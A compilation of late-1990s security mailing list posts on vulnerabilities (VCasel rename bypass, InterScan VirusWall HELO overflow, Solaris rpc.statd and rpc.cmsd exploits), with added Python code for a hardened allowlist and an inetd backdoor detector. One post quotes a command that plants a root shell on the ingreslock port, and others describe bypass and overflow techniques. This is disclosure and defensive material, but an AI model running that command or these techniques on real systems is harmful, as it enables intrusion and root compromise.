-E X P L A N A T I O N- The program does succeed in limiting the names of the files executed, but there is no path verification. For example, if an admin said user JohnDoe could execute write.exe, the admin isn't specifying c:\windows\write.exe, just the binary write.exe. Now JohnDoe decides that he is getting bored on the network, so he goes off and finds his favorite game online (pong.exe) and downloads it to his home directory on H: (a totally different drive and path than write.exe). He first tries to execute pong.exe from his available drives folder and sees an "Unauthorized Executable" message window pop up on his screen. Next John decides to re-download the game, but this time name it something different; he chooses to name it (when prompted by the client) write.exe, but he saves it to his home directory. He once again tries to run it from his available drives folder and w00p! it started up. Now sure, one person running a game of some sort isn't that big of a deal, but think of the possibilities. What if he renamed another, far more malicious file write.exe?
I have tested several executables with this hole and was able to load a login/password logger from a normal user account that would start on boot-up. Also, from a normal user I was able to view and change files/directories/drives that were specified as hidden and "inaccessible" through VCasel by simply copying and renaming File Manager. The ramifications are practically endless. -F I X- No fix/patch is presently available from what I know. -- [EMAIL PROTECTED] http://bcu.n3.net
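The bulletin's point is that a name-only allowlist is defeated by renaming. The following is an added illustration, not VCasel code or anything from the bulletin's author: it contrasts a basename-only check with one that pins the canonical path and a SHA-256 of the approved binary, using constructed temporary files (the "write.exe" and "pong.exe" names mirror the report).

```python
import hashlib
import os
import tempfile


def weak_is_allowed(candidate_path, allowed_names):
    """Name-only allowlist: the flaw the VCasel report describes."""
    return os.path.basename(candidate_path).lower() in {n.lower() for n in allowed_names}


def sha256_of(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def hardened_is_allowed(candidate_path, allowed_entries):
    """Path-and-hash allowlist: entries map a canonical path -> expected SHA-256."""
    real = os.path.normcase(os.path.realpath(candidate_path))
    expected = allowed_entries.get(real)
    if expected is None:
        return False  # same name, but not the approved location
    try:
        return sha256_of(real) == expected  # approved location, contents replaced -> reject
    except OSError:
        return False


def demo():
    """Constructed scenario: approved write.exe in a system dir, renamed game in a home dir."""
    root = tempfile.mkdtemp()
    system_dir = os.path.join(root, "windows")
    home_dir = os.path.join(root, "home")
    os.makedirs(system_dir)
    os.makedirs(home_dir)
    approved = os.path.join(system_dir, "write.exe")
    impostor = os.path.join(home_dir, "write.exe")  # pong.exe saved under the approved name
    with open(approved, "wb") as f:
        f.write(b"constructed stand-in for the real write.exe")
    with open(impostor, "wb") as f:
        f.write(b"constructed stand-in for a game renamed to write.exe")
    allowed_entries = {os.path.normcase(os.path.realpath(approved)): sha256_of(approved)}
    return {
        "weak_approved": weak_is_allowed(approved, ["write.exe"]),
        "weak_impostor": weak_is_allowed(impostor, ["write.exe"]),  # passes: the bug
        "hardened_approved": hardened_is_allowed(approved, allowed_entries),
        "hardened_impostor": hardened_is_allowed(impostor, allowed_entries),  # rejected
    }
```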
Re: Interscan VirusWall NT 3.23/3.3 buffer overflow.
Just to keep everyone updated, Trend has examined the exploit and is currently in the process of testing an official patch for this problem. This should be available within a few hours at most. Thank you, Bob Li Product Manager Trend Micro, Inc. E-Mail: [EMAIL PROTECTED] Phone: 408-863-6341 -Original Message- From: dark spyrit [mailto:[EMAIL PROTECTED]] Sent: Sunday, November 07, 1999 4:52 AM To: [EMAIL PROTECTED] Subject: Interscan VirusWall NT 3.23/3.3 buffer overflow. A buffer overflow exists on the VirusWall smtp gateway - by sending a long HELO command you can overflow the buffer and execute arbitrary code. Example code has been written which will spawn a command prompt on a port you specify. Before you shrug this one off, take a look: Connected to mail1.microsoft.com. Escape character is '^]'. 220 mail1.microsoft.com InterScan VirusWall NT ESMTP 3.23 (build 9/10/99) ready at Sun, 07 Nov 1999 03:38:44 -0800 (Pacific Standard Time) The ironic thing here is, VirusWall was designed to prevent viruses and 'malicious code'. Obviously not a lot of thought was taken before laying their trust into 3rd party 'security' products. A quick note to the millions out there who would give their right arm to compromise Microsoft's network - sorry, their firewall would prevent the payload from spawning a remote shell.. unless of course it was modified to stop an existing service to open a port :) Exploit source and binary are available at http://www.beavuh.org. Credit to Liraz Siri for bringing this to our attention. Hi to eEye/w00w00/teso. dark spyrit http://www.beavuh.org - bend over and pray.
ASUS mother board security question...
Question from a co-worker that I do not have an answer to... Does anyone reading BugTraq know the answer, and whether or not this is a major security exposure? Bob Statement of fact and question(s) below: Recently I built a new computer and I noticed that the ASUS motherboard has a function (if you are using an ATX power supply) to remotely turn on the computer if anything is received on either the LAN or modem ports. It seems that anything that triggers an external interrupt line will turn on the computer. Security questions: 1) am I correct in assuming that anyone who sends a packet to you over the Internet will appear on the LAN port if you have a cable modem, and if so will they have access to your computer? 2) what options do I have to secure the computer? (multiboot OS/2 and Linux) I am aware that a BIOS switch will disable these features, but they could be useful if the machine is properly configured. == End of statement and questions... R.S. (Bob) Heuman - Toronto, ON, Canada === <[EMAIL PROTECTED]>or <[EMAIL PROTECTED]> Copyright retained. My opinions - no one else's... If this is illegal where you are, do not read it!
Compaq CIM UG Overwrites Legal Notice
We discovered today that during Compaq Insight Manager upgrades to v4.23b they overwrite the HKLM\Software\Microsoft\WindowsNT\CurrentVersion\Winlogon\LegalNoticeCaption and LegalNoticeText with a message to continue the installation after reboot. When the installation is completed after rebooting, these keys are cleared and your legal notice is gone. If your security policies are reliant on legal notices, this is not a good thing. We will open an incident with Compaq in the morning, but I felt this might be something folks should be aware of immediately since I have not seen it reported elsewhere. Bob Free Sr Network Specialist Pacific Gas & Electric Co. Auburn, CA CTS/IO/DC/System Server Support Internal 732.5196 External 530.889.5196 mailto:[EMAIL PROTECTED]
Re: Vulnerability in Solaris 2.6. rpc.statd ?
I found two binary-only exploits on a hacked machine. The one of most interest was "amexp" which when executed without arguments presents the following: Usage: ./amexp address cache command type [port] Further help: address-system address cache -system hostname command-execute this command type -0: Solaris 2.5.1 stock, 1: Solaris 2.5.1 patched, 2.6 & 2.7 port -optional port to bypass portmapper A shell script that was included was "go.amexp" which contained: ./amexp $1 $2 "echo 'ingreslock stream tcp nowait root /bin/sh sh' > /tmp/.xp;/usr/sbin/inetd -s /tmp/.xp" $3 The command is nearly identical to what is used for both tooltalk and rpc.cmsd attacks. The proper patches were installed and I do not believe that it is the statd/automountd exploit since no indirect rpc services execution was attempted. This incident is closed. - Original Message - From: Tabor J . Wells <[EMAIL PROTECTED]> To: Bob Todd <[EMAIL PROTECTED]> Cc: <[EMAIL PROTECTED]> Sent: Tuesday, August 24, 1999 1:52 PM Subject: Re: Vulnerability in Solaris 2.6. rpc.statd ? > On Sat, Aug 21, 1999 at 12:31:18PM -0400, > Bob Todd <[EMAIL PROTECTED]> is thought to have said: > > > While performing an on-site incident response at > > ___, I found several > > Solaris-oriented exploit programs including a > > statd2.6 (others were calendar > > manager, tooltalk, and lockd?). Since there is an > > exploit program for statd on > > Solaris 2.6, I could conclude that Solaris 2.6 > > statd is vulnerable to attack. I > > have not tried the exploit, but since the machine > > was probably compromised > > by one of these programs, the threat seems real!! > > And did this server have the statd patch installed (106592-02 on sparc and > 106593-02 on x86)? Did it have the various security patches for the other > services mentioned installed as well? > > Perhaps the program was part of the exploit which allowed indirect RPC > calls with statd that was discussed here (and elsewhere) several weeks > back.
> > I don't think your conclusion is supported given the information you > provided. Perhaps you could provide more information about the exploit > before rushing to claim that there is a new vulnerability. > > Tabor > > -- > __ __ > Tabor J. Wells [EMAIL PROTECTED] > Technology Manager http://www.smarterliving.com > Smarter Living, Inc. It's your time. It's your money. >
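The "go.amexp" script above leaves two artifacts a responder can look for: an inetd-style service line that hands out a root shell, and an inetd started with a configuration file outside /etc. This added detection sketch is not from the post or from any vendor; it runs over constructed sample lines that mirror the report (the ingreslock entry and the /tmp/.xp config path) and assumes the Solaris inetd form `inetd -s <config-file>` shown there.

```python
import re

# Constructed sample inetd.conf-style lines; the last one is what go.amexp writes to /tmp/.xp.
SAMPLE_INETD = """\
ftp     stream  tcp  nowait  root  /usr/sbin/in.ftpd    in.ftpd
telnet  stream  tcp  nowait  root  /usr/sbin/in.telnetd in.telnetd
# comment lines and blanks are ignored

ingreslock stream tcp nowait root /bin/sh sh
"""

# Constructed sample process listing lines (user, pid, command).
SAMPLE_PS = """\
root   123  /usr/sbin/inetd -s
root   456  /usr/sbin/inetd -s /tmp/.xp
"""

SHELLS = {"/bin/sh", "/bin/csh", "/bin/ksh", "/bin/bash", "/usr/bin/sh", "/usr/bin/ksh"}


def shell_listeners(conf_text):
    """Return (service, user, program) for inetd entries whose server program is a shell."""
    hits = []
    for raw in conf_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split()
        if len(fields) < 6:
            continue  # not a complete service line
        service, user, program = fields[0], fields[4], fields[5]
        if program in SHELLS:
            hits.append((service, user, program))
    return hits


def inetd_alternate_configs(ps_text, default="/etc/inetd.conf"):
    """Return config-file paths given to 'inetd -s <file>' that are not the default location."""
    alt = []
    for line in ps_text.splitlines():
        m = re.search(r"\binetd\s+-s\s+(\S+)", line)
        if m and m.group(1) != default:
            alt.append(m.group(1))
    return alt


if __name__ == "__main__":
    print(shell_listeners(SAMPLE_INETD))        # [('ingreslock', 'root', '/bin/sh')]
    print(inetd_alternate_configs(SAMPLE_PS))   # ['/tmp/.xp']
```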
Vulnerability in Solaris 2.6. rpc.statd ?
While performing an on-site incident response at ___, I found several Solaris-oriented exploit programs including a statd2.6 (others were calendar manager, tooltalk, and lockd?). Since there is an exploit program for statd on Solaris 2.6, I could conclude that Solaris 2.6 statd is vulnerable to attack. I have not tried the exploit, but since the machine was probably compromised by one of these programs, the threat seems real!! __ Bob and Ann Todd Advanced Research Corporation Office: (703) 938-4385 Mobile: (703) 203-0855 www.arc.com
Re: Troff dangerous.
> (1) Root installs the malicious roff source unknowingly. > > (2) During the process of building/installing the program, X > at which point the trojan > horse does its dirty work. s/X/configure runs some stuff/ s/X/Make runs some stuff/ s/X/shell runs some stuff/ s/X/some random evil program runs/ Yeah, a troff macro is a little obtuse for the younger generation, but so what? How many people who run those nifty gnu autoconf twiddlies do you think are checking beforehand what they are doing as root? At the risk of further flogging the sticky spot on the road that used to be a horse, this really shouldn't be a shocker to anyone on this list. Most anything you run as root can be made to own you by whoever can change it before you run it. -Bob
Exploit of rpc.cmsd
The calendar manager (rpc.cmsd) on Solaris 2.5 and 2.5.1 is vulnerable to a buffer overflow attack. Further, it appears that even patched versions may be vulnerable. Also, rpc.cmsd under Solaris 2.6 could also be problematic. Where possible, it should be disabled in inetd.conf. The exploit allows for remote root access where we have seen the intruder delete administrator logs, change homepages, and insert backdoors. The attack signature is similar to the tooltalk attack.